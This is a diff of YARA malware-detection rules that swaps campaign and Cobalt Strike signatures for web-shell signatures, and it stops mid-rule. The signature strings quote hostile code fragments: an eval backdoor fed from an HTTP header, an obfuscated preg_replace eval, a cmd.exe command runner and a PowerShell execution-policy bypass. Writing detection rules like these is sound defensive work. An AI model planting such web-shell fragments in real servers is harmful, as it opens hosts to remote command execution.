+		logic_hash = "9099504870c1e466808060f11aea38472832846d24e3c84fdd69b7d26bfed69d"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		hash1 = "5d2e4fd08f81e3b2eb2f3eaae16eb32ae02e760afc36fa17f4649322f6da53fb"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a1 = "Go build"
-		$sa1 = "github.com/rolfl/modbus"
-		$sb1 = "main.TaskList.executeCommand"
-		$sb2 = "main.TargetList.getTargetIpList"
-		$sb3 = "main.TaskList.getTaskIpList"
-		$sb4 = "main.CycleInfo" fullword
+		$s8 = "if ($l) echo '<a href=\"' . $self . '?action=permission&amp;file=' . urlencode($"
+		$s9 = "return base64_decode('R0lGODlhEQANAJEDAMwAAP///5mZmf///yH5BAHoAwMALAAAAAARAA0AAA"
 
 	condition:
-		filesize < 30MB and ( $sa1 and 3 of ( $sb* ) ) or 4 of them
+		1 of them
 }
-
-rule SIGNATURE_BASE_ME_Campaign_Malware_1 : FILE
+rule SIGNATURE_BASE_Webshell_Jspspyweb
 {
 	meta:
-		description = "Detects malware from Middle Eastern campaign reported by Talos"
+		description = "Web Shell - file Jspspyweb.jsp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7c844c5c-caf0-5968-ac1a-72886fcf97cf"
-		date = "2018-02-07"
-		modified = "2023-12-05"
-		reference = "http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_middle_east_talosreport.yar#L13-L26"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L111-L125"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e5ea689de4be64a02aed31c85a4bd56561ba932587998bc276ddba248d73fa2d"
-		score = 75
+		hash = "4e9be07e95fff820a9299f3fb4ace059"
+		logic_hash = "491d9c4efee27469f2a26f6fcb7f7c768eac60977e640096ea5f78ff346e7fbe"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "1176642841762b3bc1f401a5987dc55ae4b007367e98740188468642ffbd474e"
+
+	strings:
+		$s0 = "      out.print(\"<tr><td width='60%'>\"+strCut(convertPath(list[i].getPath()),7"
+		$s3 = "  \"reg add \\\"HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\CurrentControlSet\\\\Control"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 5000KB and ( pe.imphash ( ) == "618f76eaf4bd95c690d43e84d617efe9" )
+		all of them
 }
-
-rule SIGNATURE_BASE_ME_Campaign_Malware_2 : FILE
+rule SIGNATURE_BASE_Webshell_Safe_Mode_Bypass_PHP_4_4_2_And_PHP_5_1_2
 {
 	meta:
-		description = "Detects malware from Middle Eastern campaign reported by Talos"
+		description = "Web Shell - file Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a0beec30-62ff-54c3-ab62-c54454b89f8d"
-		date = "2018-02-07"
-		modified = "2023-12-05"
-		reference = "http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_middle_east_talosreport.yar#L28-L48"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L126-L140"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "414e7760c56d2a1713258bb5c5f65e4fb561523ae037f8715d7fba5914ef9211"
-		score = 75
+		hash = "49ad9117c96419c35987aaa7e2230f63"
+		logic_hash = "d3d27d80f5f3adbc050a59d0c25953ec5d634344b5d051a4abdf4eeed3b8b035"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "76a9b603f1f901020f65358f1cbf94c1a427d9019f004a99aa8bff1dea01a881"
 
 	strings:
-		$s1 = "QuickAssist.exe" fullword wide
-		$s2 = "<description>Microsoft Modern Sharing Solution</description>" fullword ascii
-		$s3 = "GBEWCWA" fullword ascii
-		$s4 = "name=\"QuickAssist\" " fullword ascii
-		$s5 = "Cimzal" fullword ascii
+		$s0 = "die(\"\\nWelcome.. By This script you can jump in the (Safe Mode=ON) .. Enjoy\\n"
+		$s1 = "Mode Shell v1.0</font></span></a></font><font face=\"Webdings\" size=\"6\" color"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 600KB and ( pe.imphash ( ) == "b06055e6cc2a804111ab6964df1ca4ae" or 4 of them )
+		1 of them
 }
-rule SIGNATURE_BASE_ME_Campaign_Malware_3 : FILE
+rule SIGNATURE_BASE_Webshell_Simattacker_Vrsion_1_0_0_Priv8_4_My_Friend
 {
 	meta:
-		description = "Detects malware from Middle Eastern campaign reported by Talos"
+		description = "Web Shell - file SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d8bfd426-ff42-5332-8206-67a558509494"
-		date = "2018-02-07"
-		modified = "2023-12-05"
-		reference = "http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_middle_east_talosreport.yar#L50-L66"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L141-L155"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7d45f9f624285ed13a16901335585490459f22ef8af157c38b720118735ed432"
-		score = 75
+		hash = "089ff24d978aeff2b4b2869f0c7d38a3"
+		logic_hash = "fc553942b06b305f7b0d5b072a8d4517b0e51229545440ea9c43e9be01d64efa"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b"
 
 	strings:
-		$x1 = "objWShell.Run \"powershell.exe -ExecutionPolicy Bypass -File \"\"%appdata%\"\"\\sys.ps1\", 0 " fullword ascii
-		$x2 = "objFile.WriteLine \"New-Item -Path \"\"$ENV:APPDATA\\Microsoft\\Templates\"\" -ItemType Directory -Force }\" " fullword ascii
-		$x3 = "objFile.WriteLine \"$path = \"\"$ENV:APPDATA\\Microsoft\\Templates\\Report.doc\"\"\" " fullword ascii
-		$s4 = "File=appData & \"\\sys.ps1\"" fullword ascii
+		$s2 = "echo \"<a href='?id=fm&fchmod=$dir$file'><span style='text-decoration: none'><fo"
+		$s3 = "fputs ($fp ,\"\\n*********************************************\\nWelcome T0 Sim"
 
 	condition:
-		uint16( 0 ) == 0x6553 and filesize < 400KB and 1 of them
+		1 of them
 }
-
-rule SIGNATURE_BASE_ME_Campaign_Malware_4 : FILE
+rule SIGNATURE_BASE_Webshell_Phpshell_2_1_Pwhash
 {
 	meta:
-		description = "Detects malware from Middle Eastern campaign reported by Talos"
+		description = "Web Shell - file pwhash.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1ff83ac6-e3f1-55e2-a811-e526b8235c78"
-		date = "2018-02-07"
-		modified = "2023-12-05"
-		reference = "http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_middle_east_talosreport.yar#L68-L79"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L156-L170"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "83340b2d8f5f58f886eb318b80d7fbb0b9a4f5ad634db857edc405932f3ea5bc"
-		score = 75
+		hash = "ba120abac165a5a30044428fac1970d8"
+		logic_hash = "616c0570550cdb9394b5675864d4eec3fa62390f880817406b2a3b63952b69f0"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c5bfb5118a999d21e9f445ad6ccb08eb71bc7bd4de9e88a41be9cf732156c525"
-
-	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and pe.imphash ( ) == "fb7da233a35ac523d6059fff543627ab"
-}
-rule SIGNATURE_BASE_ME_Campaign_Malware_5 : FILE
-{
-	meta:
-		description = "Detects malware from Middle Eastern campaign reported by Talos"
-		author = "Florian Roth (Nextron Systems)"
-		id = "241a4236-2688-5920-87f7-eed33963ec60"
-		date = "2018-02-07"
-		modified = "2022-08-18"
-		reference = "http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_middle_east_talosreport.yar#L81-L100"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b958a09be09de03e702a0653cf51148698b35c29bed90edbc3a65e485f0c3aa6"
-		score = 75
-		quality = 85
-		tags = "FILE"
-		hash1 = "d49e9fdfdce1e93615c406ae13ac5f6f68fb7e321ed4f275f328ac8146dd0fc1"
-		hash2 = "e66af059f37bdd35056d1bb6a1ba3695fc5ce333dc96b5a7d7cc9167e32571c5"
 
 	strings:
-		$s1 = "D:\\me\\do\\do\\obj\\" ascii
-		$s2 = "Select * from Win32_ComputerSystem" fullword wide
-		$s3 = "Get_Antivirus" fullword ascii
-		$s4 = "{{\"id\":\"{0}\",\"user\":\"{1}\",\"path\":\"{2}\"}}" fullword wide
-		$s5 = "update software online" fullword wide
-		$s6 = "time.nist.gov" fullword wide
+		$s1 = "<tt>&nbsp;</tt>\" (space), \"<tt>[</tt>\" (left bracket), \"<tt>|</tt>\" (pi"
+		$s3 = "word: \"<tt>null</tt>\", \"<tt>yes</tt>\", \"<tt>no</tt>\", \"<tt>true</tt>\","
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 60KB and 5 of them or all of them
+		1 of them
 }
-rule SIGNATURE_BASE_SVG_Loadurl : FILE
+rule SIGNATURE_BASE_Webshell_Phpremoteview
 {
 	meta:
-		description = "Detects a tiny SVG file that loads an URL (as seen in CryptoWall malware infections)"
+		description = "Web Shell - file PHPRemoteView.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c3d4c95f-ef8b-52ff-9cf9-d66d9b99a490"
-		date = "2015-05-24"
-		modified = "2023-12-05"
-		reference = "http://goo.gl/psjCCc"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_cryptowall_svg.yar#L2-L21"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L171-L185"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d9e40694e2d0099495289a2074e266bace9b0d9d776391020a1527eaabd2a395"
-		score = 50
+		hash = "29420106d9a81553ef0d1ca72b9934d9"
+		logic_hash = "2de48b8640c0f2089a4a0badb4429127cb61ac972459290041e20b959e4e0c05"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ac8ef9df208f624be9c7e7804de55318"
-		hash2 = "3b9e67a38569ebe8202ac90ad60c52e0"
-		hash3 = "7e2be5cc785ef7711282cea8980b9fee"
-		hash4 = "4e2c6f6b3907ec882596024e55c2b58b"
 
 	strings:
-		$s1 = "</svg>" nocase
-		$s2 = "<script>" nocase
-		$s3 = "location.href='http" nocase
+		$s2 = "<input type=submit value='\".mm(\"Delete all dir/files recursive\").\" (rm -fr)'"
+		$s4 = "<a href='$self?c=delete&c2=$c2&confirm=delete&d=\".urlencode($d).\"&f=\".u"
 
 	condition:
-		all of ( $s* ) and filesize < 600
+		1 of them
 }
-rule SIGNATURE_BASE_TA459_Malware_May17_1 : FILE
+rule SIGNATURE_BASE_Webshell_Jsp_12302
 {
 	meta:
-		description = "Detects TA459 related malware"
+		description = "Web Shell - file 12302.jsp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "eb5d2464-ab95-5f5d-8b20-fa023da53130"
-		date = "2017-05-31"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/RLf9qU"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ta459.yar#L12-L26"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L186-L201"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2655d4c3a28ad2f77bbf50cd3dface7de49f675f0f974aa44d9b69c3f803da30"
-		score = 75
+		hash = "a3930518ea57d899457a62f372205f7f"
+		logic_hash = "0959a138abc791f17344e25e84b24888ddfe238981fc7e3ffd76c0390006ea46"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "5fd61793d498a395861fa263e4438183a3c4e6f1e4f098ac6e97c9d0911327bf"
 
 	strings:
-		$s3 = "xtsewy" fullword ascii
-		$s6 = "CW&mhAklnfVULL" ascii
+		$s0 = "</font><%out.print(request.getRealPath(request.getServletPath())); %>" fullword
+		$s1 = "<%@page import=\"java.io.*,java.util.*,java.net.*\"%>" fullword
+		$s4 = "String path=new String(request.getParameter(\"path\").getBytes(\"ISO-8859-1\""
 
 	condition:
-		( uint16( 0 ) == 0x6152 and filesize < 800KB and all of them )
+		all of them
 }
-rule SIGNATURE_BASE_TA459_Malware_May17_2 : FILE
+rule SIGNATURE_BASE_Webshell_Caidao_Shell_Guo
 {
 	meta:
-		description = "Detects TA459 related malware"
+		description = "Web Shell - file guo.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "62954422-4657-5ded-9883-bb78eac697fb"
-		date = "2017-05-31"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/RLf9qU"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ta459.yar#L28-L45"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L202-L216"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9904f3905672e5209df037dff1fa2e4d88ee33531096045eb9b9f7460458b6a2"
-		score = 75
+		hash = "9e69a8f499c660ee0b4796af14dc08f0"
+		logic_hash = "efb7055f42dd6be41ea3983cacea1a70b83675c8ebcb88ae3b250066a29e94eb"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4601133e94c4bc74916a9d96a5bc27cc3125cdc0be7225b2c7d4047f8506b3aa"
 
 	strings:
-		$a1 = "Mcutil.dll" fullword ascii
-		$a2 = "mcut.exe" fullword ascii
-		$s1 = "Software\\WinRAR SFX" fullword ascii
-		$s2 = "AYou may need to run this self-extracting archive as administrator" fullword wide
+		$s0 = "<?php ($www= $_POST['ice'])!"
+		$s1 = "@preg_replace('/ad/e','@'.str_rot13('riny').'($ww"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 900KB and all of ( $a* ) and 1 of ( $s* ) )
+		1 of them
 }
-rule SIGNATURE_BASE_Eternalrocks_Taskhost : FILE
+rule SIGNATURE_BASE_Webshell_PHP_Redcod
 {
 	meta:
-		description = "Detects EternalRocks Malware - file taskhost.exe"
+		description = "Web Shell - file redcod.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8926cdf8-6a3c-5237-80f5-bda9efb39a32"
-		date = "2017-05-18"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/stamparm/status/864865144748298242"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_eternalrocks.yar#L12-L30"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L217-L231"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "45e5295f34280078c586c4cb643dba65aed63beffb1d6ded05de03403caf273a"
-		score = 75
+		hash = "5c1c8120d82f46ff9d813fbe3354bac5"
+		logic_hash = "eddfd90d27793756bcc685ffe33b2dabc3bb28b9654c33a0f99359e8b6f13678"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "cf8533849ee5e82023ad7adbdbd6543cb6db596c53048b1a0c00b3643a72db30"
 
 	strings:
-		$x1 = "EternalRocks.exe" fullword wide
-		$s1 = "sTargetIP" fullword ascii
-		$s2 = "SERVER_2008R2_SP0" fullword ascii
-		$s3 = "20D5CCEE9C91A1E61F72F46FA117B93FB006DB51" fullword ascii
-		$s4 = "9EBF75119B8FC7733F77B06378F9E735D34664F6" fullword ascii
+		$s0 = "H8p0bGFOEy7eAly4h4E4o88LTSVHoAglJ2KLQhUw" fullword
+		$s1 = "HKP7dVyCf8cgnWFy8ocjrP5ffzkn9ODroM0/raHm" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 15000KB and 1 of ( $x* ) or 3 of them )
+		all of them
 }
-rule SIGNATURE_BASE_Eternalrocks_Svchost : FILE
+rule SIGNATURE_BASE_Webshell_Remview_Fix
 {
 	meta:
-		description = "Detects EternalRocks Malware - file taskhost.exe"
+		description = "Web Shell - file remview_fix.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c38d3faa-06a2-5f57-a917-91974941352f"
-		date = "2017-05-18"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/stamparm/status/864865144748298242"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_eternalrocks.yar#L32-L47"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L232-L246"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "989df6d582949adbc4e0e2063c99d9ad83c367cedae1030dc23aade091216602"
-		score = 75
+		hash = "a24b7c492f5f00e2a19b0fa2eb9c3697"
+		logic_hash = "0b29ef74fb0786aefe99281360dc4fe27005eac345a36bc14259afa6fc555303"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "589af04a85dc66ec6b94123142a17cf194decd61f5d79e76183db026010e0d31"
 
 	strings:
-		$s1 = "WczTkaJphruMyBOQmGuNRtSNTLEs" fullword ascii
-		$s2 = "svchost.taskhost.exe" fullword ascii
-		$s3 = "ConfuserEx v" ascii
+		$s4 = "<a href='$self?c=delete&c2=$c2&confirm=delete&d=\".urlencode($d).\"&f=\".u"
+		$s5 = "echo \"<P><hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 500KB and 2 of them )
+		1 of them
 }
-
-rule SIGNATURE_BASE_MAL_Ryuk_Ransomware : FILE
+rule SIGNATURE_BASE_Webshell_Asp_Cmd
 {
 	meta:
-		description = "Detects strings known from Ryuk Ransomware"
+		description = "Web Shell - file cmd.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "25d40631-4158-5d3d-913e-a2f1233489e0"
-		date = "2018-12-31"
-		modified = "2023-12-05"
-		reference = "https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_ryuk_ransomware.yar#L3-L24"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L247-L262"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "01e8ad348e5954374fc0f9fc25ba1ee83db4a2a50e622b27640aa2eb394dc5a0"
-		score = 75
+		hash = "895ca846858c315a3ff8daa7c55b3119"
+		logic_hash = "8e72b54267c2f83b288cdd43ccd56ae4ab1f95c17f4dde077e637d951df54866"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		hash1 = "965884f19026913b2c57b8cd4a86455a61383de01dabb69c557f45bb848f6c26"
-		hash2 = "b8fcd4a3902064907fb19e0da3ca7aed72a7e6d1f94d971d1ee7a4d3af6a800d"
-
-	strings:
-		$x1 = "/v \"svchos\" /f" fullword wide
-		$x2 = "\\Documents and Settings\\Default User\\finish" wide
-		$x3 = "\\users\\Public\\finish" wide
-		$x4 = "lsaas.exe" fullword wide
-		$x5 = "RyukReadMe.txt" fullword wide
-
-	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and ( pe.imphash ( ) == "4a069c1abe5aca148d5a8fdabc26751e" or pe.imphash ( ) == "dc5733c013378fa418d13773f5bfe6f1" or 1 of them )
-}
-rule SIGNATURE_BASE_APT_Cobaltstrike_Beacon_Indicator : FILE
-{
-	meta:
-		description = "Detects CobaltStrike beacons"
-		author = "JPCERT"
-		id = "8508c7a0-0131-59b1-b537-a6d1c6cb2b35"
-		date = "2018-11-09"
-		modified = "2023-12-05"
-		reference = "https://github.com/JPCERTCC/aa-tools/blob/master/cobaltstrikescan.py"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cobaltstrike.yar#L40-L52"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0f429a7a8c8bbea22eba3bbf81e391dab8e957583283a995d1d60d42f17c20e7"
-		score = 75
-		quality = 83
-		tags = "FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$v1 = { 73 70 72 6E 67 00 }
-		$v2 = { 69 69 69 69 69 69 69 69 }
+		$s0 = "<%= \"\\\\\" & oScriptNet.ComputerName & \"\\\" & oScriptNet.UserName %>" fullword
+		$s1 = "Set oFileSys = Server.CreateObject(\"Scripting.FileSystemObject\")" fullword
+		$s3 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
+		1 of them
 }
-rule SIGNATURE_BASE_HKTL_Cobaltstrike_Beacon_Strings
+rule SIGNATURE_BASE_Webshell_Php_Sh_Server
 {
 	meta:
-		description = "Identifies strings used in Cobalt Strike Beacon DLL"
-		author = "Elastic"
-		id = "af558aa2-a3dc-5a7a-bc74-42bb2246091c"
-		date = "2021-03-16"
-		modified = "2023-12-05"
-		reference = "https://www.elastic.co/blog/detecting-cobalt-strike-with-memory-signatures"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cobaltstrike.yar#L54-L67"
+		description = "Web Shell - file server.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L263-L276"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4349a7ad94df2269217b55c2aef9628c4eef078566c276936accdd4f996ba2cf"
-		score = 75
+		hash = "d87b019e74064aa90e2bb143e5e16cfa"
+		logic_hash = "9f4d940a381e7bd298a252f485d5f1d26fd191c27f6e86e8fa6028237592a8c3"
+		score = 50
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "%02d/%02d/%02d %02d:%02d:%02d"
-		$s2 = "Started service %s on %s"
-		$s3 = "%s as %s\\%s: %d"
+		$s0 = "eval(getenv('HTTP_CODE'));" fullword
 
 	condition:
-		2 of them
+		all of them
 }
-rule SIGNATURE_BASE_HKTL_Cobaltstrike_Beacon_XOR_Strings
+rule SIGNATURE_BASE_Webshell_PH_Vayv_PH_Vayv
 {
 	meta:
-		description = "Identifies XOR'd strings used in Cobalt Strike Beacon DLL"
-		author = "Elastic"
-		id = "359160a8-cf1c-58a8-bf7f-c09a8d661308"
-		date = "2021-03-16"
-		modified = "2023-12-05"
-		reference = "https://www.elastic.co/blog/detecting-cobalt-strike-with-memory-signatures"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cobaltstrike.yar#L69-L88"
+		description = "Web Shell - file PH Vayv.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L277-L291"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b5009c29055784ce6371100417b862f723d7e3c1b4081c563fcd8770db48051f"
-		score = 75
+		hash = "35fb37f3c806718545d97c6559abd262"
+		logic_hash = "8769400b7b6828849f27092d790d291721c7e1b39dfd2080de5da8e59dd25523"
+		score = 70
 		quality = 85
 		tags = ""
-		xor_s1 = "%02d/%02d/%02d %02d:%02d:%02d"
-		xor_s2 = "Started service %s on %s"
-		xor_s3 = "%s as %s\\%s: %d"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "%02d/%02d/%02d %02d:%02d:%02d" xor(0x01-0xff)
-		$s2 = "Started service %s on %s" xor(0x01-0xff)
-		$s3 = "%s as %s\\%s: %d" xor(0x01-0xff)
-		$fp1 = "MalwareRemovalTool"
+		$s0 = "style=\"BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px in"
+		$s4 = "<font color=\"#858585\">SHOPEN</font></a></font><font face=\"Verdana\" style"
 
 	condition:
-		2 of ( $s* ) and not 1 of ( $fp* )
+		1 of them
 }
-rule SIGNATURE_BASE_HKTL_Cobaltstrike_Beacon_4_2_Decrypt
+rule SIGNATURE_BASE_Webshell_Caidao_Shell_Ice
 {
 	meta:
-		description = "Identifies deobfuscation routine used in Cobalt Strike Beacon DLL version 4.2"
-		author = "Elastic"
